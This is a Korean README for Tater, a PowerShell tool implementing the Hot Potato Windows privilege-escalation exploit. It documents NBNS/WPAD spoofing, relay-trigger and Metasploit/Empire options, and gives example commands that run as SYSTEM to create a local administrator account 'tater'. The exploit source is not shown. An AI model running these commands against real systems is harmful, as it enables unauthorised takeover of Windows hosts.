Tater
Tater는 Hot Potato Windows 권한 상승 익스플로잇의 PowerShell 구현입니다.
크레딧
모든 크레딧은 @breenmachine, @foxglovesec, Google Project Zero 및 이 익스플로잇의 세부 사항을 해결하는 데 도움을 준 모든 분들에게 돌아갑니다.
포함된 프로젝트
함수
Invoke-Tater
매개변수
- IP - 특정 로컬 IP 주소를 지정합니다. 이 매개변수를 사용하지 않으면 IP 주소가 자동으로 선택됩니다.
- SpooferIP - NBNS 스푸핑을 위한 IP 주소를 지정합니다. 권한 상승 대상에서 포트 80이 사용 중일 때 이를 우회하기 위해 두 호스트를 사용하는 경우 필요합니다.
- Command - 로컬 호스트에서 SYSTEM으로 실행할 명령입니다. 필요한 경우 PowerShell 문자 이스케이프를 사용하십시오.
- NBNS - 기본값 = 활성화됨: (Y/N) NBNS 무차별 대입 스푸핑을 활성화/비활성화합니다.
- NBNSLimit - 기본값 = 활성화됨: (Y/N) 호스트 이름이 올바르게 확인되는 동안 NBNS 스푸핑을 중지하도록 NBNS 무차별 대입 스푸퍼 제한을 활성화/비활성화합니다.
- ExhaustUDP - 기본값 = 비활성화됨: (Y/N) 모든 DNS 조회가 실패하여 NBNS 확인으로 대체되도록 UDP 포트 고갈을 활성화/비활성화합니다.
- HTTPPort - 기본값 = 80: HTTP 리스너 및 리디렉션 응답을 위한 TCP 포트를 지정합니다.
- Hostname - 기본값 = WPAD: 스푸핑할 호스트 이름입니다. Windows Server 2008에서는 WPAD.DOMAIN.TLD가 필요할 수 있습니다.
- WPADDirectHosts - wpad.dat 파일에서 직접(direct)으로 나열할 호스트의 쉼표로 구분된 목록입니다. localhost는 항상 직접으로 나열됩니다.
- WPADPort - 기본값 = 80: wpad.dat 파일에 포함할 프록시 서버 포트를 지정합니다.
- Trigger - 기본값 = 1: HTTP에서 SMB 릴레이를 트리거하는 데 사용할 트리거 유형입니다. 0 = 없음, 1 = Windows Defender 서명 업데이트, 2 = Windows 10 웹클라이언트/예약 작업
- TaskDelete - 기본값 = 활성화됨: (Y/N) 트리거 2에 대한 예약 작업 삭제를 활성화/비활성화합니다. 활성화된 경우 작업 이름에 무작위 문자열이 추가되어 여러 번의 트리거 2 실행 후 오류를 방지합니다.
- Taskname - 기본값 = Tater: 트리거 2와 함께 사용할 예약 작업 이름입니다. Tater가 여러 번의 트리거 2 실행 후 작동하지 않는 경우 작업 이름을 변경해 보십시오.
- RunTime - 기본값 = 무제한: (정수) 실행 시간(분)을 설정합니다.
- ConsoleOutput - 기본값 = 비활성화됨: (Y/N) 실시간 콘솔 출력을 활성화/비활성화합니다. 셸을 통해 이 옵션을 사용하는 경우 셸이 중단되지 않는지 테스트하십시오.
- StatusOutput - 기본값 = 활성화됨: (Y/N) 시작 메시지를 활성화/비활성화합니다.
- ShowHelp - 기본값 = 활성화됨: (Y/N) 시작 시 도움말 메시지를 활성화/비활성화합니다.
- Tool - 기본값 = 0: (0,1,2) Metasploit의 Interactive PowerShell 세션 및 Empire과 같은 외부 도구를 통해 더 나은 작동을 위한 기능을 활성화/비활성화합니다. 0 = 없음, 1 = Metasploit, 2 = Empire
Stop-Tater
- Invoke-Tater를 수동으로 중지하는 함수입니다.
사용법
예제
-
기본 트리거 1 예제
Invoke-Tater -Trigger 1 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"
-
기본 트리거 2 예제
Invoke-Tater -Trigger 2 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"
-
권한 상승 대상에서 포트 80이 사용 중일 때 우회하기 위한 두 시스템 설정
WPAD 시스템 - 192.168.10.100 - 이 시스템은 wpad.dat 파일을 제공하여 권한 상승 대상의 HTTP 트래픽을 80이 아닌 HTTP 포트로 전달합니다.
Invoke-Tater -Trigger 0 -NBNS N -WPADPort 8080 -Command "null"
권한 상승 대상 - 192.168.10.101
Invoke-Tater -Command "net user Tater Winter2016 /add && net localgroup administrators Tater /add" -HTTPPort 8080 -SpooferIP 192.168.10.100
스크린샷
Windows 7에서 트리거 1 사용 (NBNS WPAD 무차별 대입 + Windows Defender 서명 업데이트)

Windows 10에서 트리거 2 사용 (WebClient 서비스 + 예약 작업)

Windows 7에서 트리거 1 및 UDP 포트 고갈 사용
